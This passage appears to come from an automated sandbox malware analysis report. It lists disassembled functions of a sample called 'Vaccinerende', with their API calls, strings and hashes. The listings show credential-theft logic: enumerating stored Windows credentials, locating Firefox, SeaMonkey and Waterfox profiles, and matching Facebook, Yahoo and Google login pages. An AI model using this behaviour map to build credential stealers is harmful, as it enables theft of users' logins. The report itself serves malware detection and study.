                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile$ErrorLastfree
                                            • String ID: |A
                                            • API String ID: 77810686-1717621600
                                            • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                            • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                            Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0041249C
                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                            • wcscpy.MSVCRT ref: 004125A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                            • String ID: r!A
                                            • API String ID: 2791114272-628097481
                                            • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                            • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                            Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                            • wcslen.MSVCRT ref: 0040C82C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                            • API String ID: 2936932814-4196376884
                                            • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                            • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                            Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040A824
                                            • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                            • wcscpy.MSVCRT ref: 0040A854
                                            • wcscat.MSVCRT ref: 0040A86A
                                            • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                            • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID: C:\Windows\system32
                                            • API String ID: 669240632-2896066436
                                            • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                            • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                            Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                            • wcslen.MSVCRT ref: 0040BE06
                                            • wcsncmp.MSVCRT ref: 0040BE38
                                            • memset.MSVCRT ref: 0040BE91
                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                            • wcschr.MSVCRT ref: 0040BF24
                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                            • String ID:
                                            • API String ID: 697348961-0
                                            • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                            • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                            Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00403CBF
                                            • memset.MSVCRT ref: 00403CD4
                                            • memset.MSVCRT ref: 00403CE9
                                            • memset.MSVCRT ref: 00403CFE
                                            • memset.MSVCRT ref: 00403D13
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403DDA
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                            • String ID: Waterfox$Waterfox\Profiles
                                            • API String ID: 4039892925-11920434
                                            • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                            • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                            Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00403E50
                                            • memset.MSVCRT ref: 00403E65
                                            • memset.MSVCRT ref: 00403E7A
                                            • memset.MSVCRT ref: 00403E8F
                                            • memset.MSVCRT ref: 00403EA4
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403F6B
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                            • API String ID: 4039892925-2068335096
                                            • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                            • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                            Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00403FE1
                                            • memset.MSVCRT ref: 00403FF6
                                            • memset.MSVCRT ref: 0040400B
                                            • memset.MSVCRT ref: 00404020
                                            • memset.MSVCRT ref: 00404035
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 004040FC
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                            • API String ID: 4039892925-3369679110
                                            • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                            • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                            Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                            • API String ID: 3510742995-2641926074
                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                            Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 004033B7
                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                            • wcscmp.MSVCRT ref: 004033FC
                                            • _wcsicmp.MSVCRT ref: 00403439
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                            • String ID: $0.@
                                            • API String ID: 2758756878-1896041820
                                            • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                            • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                            Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 2941347001-0
                                            • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                            • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                            Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00403C09
                                            • memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                            • wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • wcscat.MSVCRT ref: 00403C70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                            • API String ID: 1534475566-1174173950
                                            • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                            • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                            Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • memset.MSVCRT ref: 00414C87
                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                            • API String ID: 71295984-2036018995
                                            • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                            • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                            Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            • wcschr.MSVCRT ref: 00414458
                                            • _snwprintf.MSVCRT ref: 0041447D
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
